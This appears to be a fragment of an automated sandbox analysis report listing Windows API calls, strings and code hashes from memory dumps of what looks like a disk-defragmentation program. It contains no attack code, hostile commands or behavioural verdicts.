                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                                                                                • String ID: JD$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1177325624-1936558939
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,BB40E64E,00094638,?,?,00421AA0,BB40E64E), ref: 004242B3
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                                • String ID: %s: %I64u $3401050$3401080$8F
                                                                                                                                                                                                                                                                                                • API String ID: 730354411-3927339091
                                                                                                                                                                                                                                                                                                • Opcode ID: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction ID: 8816fc286b8afc534f6afc75fd391673b4d725b22e86aab22ab11b698ddc2395
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE3182B1654700ABC310EF25DC42F9B77E8FF84B15F104A1EF59AA21D0DBB8A544CB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                                • Instruction ID: 04dbbea40edafa167825a5640816ee55d2e105094fff44b6784cacd96e044d36
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47B136716083409FC310DF69C884A1BFBE9BFC9714F24895EE99887362D774E949CB92
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(?,?,BB40E64E,00093C38,?,?,00093E00,?,00000000,0047812F,000000FF,0041A4F1,BB40E64E,00093C38,?,00093E00), ref: 00465814
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID: 8K
                                                                                                                                                                                                                                                                                                • API String ID: 1337965791-3211281232
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b8780734ed73be5f4f2893b0bea8a6c3b62fc8eaf033f1e837d6edea0f0e4aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8361E6B0505F409FC360DF3A9880B9BFBE4BB48305F90492EE1AE93241DB796548CF5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a8541e3f689305ec2f6cb5d2be3b4f28d8c1de2ea2bbd417e2b40b4f34285ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B44193B1704210ABD710EB65EC45BAB73A8AF94704F40892FF90ED2290DB78ED45C76D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 005FD977
                                                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 005FD97F
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 005FDA08
                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 005FDA33
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 005FDA88
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                                • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                                • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0041F6D0,?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000), ref: 004262B5
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,?,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 004262E1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000,?), ref: 004262F2
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 0042630F
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 00426330
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3322701435-180763933
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                                • String ID: ...$`=
                                                                                                                                                                                                                                                                                                • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                                • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                                • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                                • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 004311B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004311C3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-4007200279
                                                                                                                                                                                                                                                                                                • Opcode ID: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c3eec78f5ba70d7f73749eb8d42c303dcc8a252b1b76d151490117dce650f0e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F34119717802055BEB10AF75CD82FBA3284DB59764F000A3EFA06EF2D2DA6CDC48466D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                                • Instruction ID: 7d708aa27c06dc00fcb9f864fdcaa6ded2618e4328842cf70fbd9c9851442ce7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941A23170021ADFC730EF65EC88B9AB3A5FF85315F50452EE85997290CB78A984CF69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 1863454828-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                                • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                                • Opcode ID: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 1295b46436a6d6ef84abe92a3e8f017b2096165fdcf3e5832b2fc3faa33b59df
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2E04F357012606B527117366C48D9F2A68DFC1B91349467EF819D1294DF38C9828AAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1879027383-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0,00094B38,?,004658D6), ref: 0040122D
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
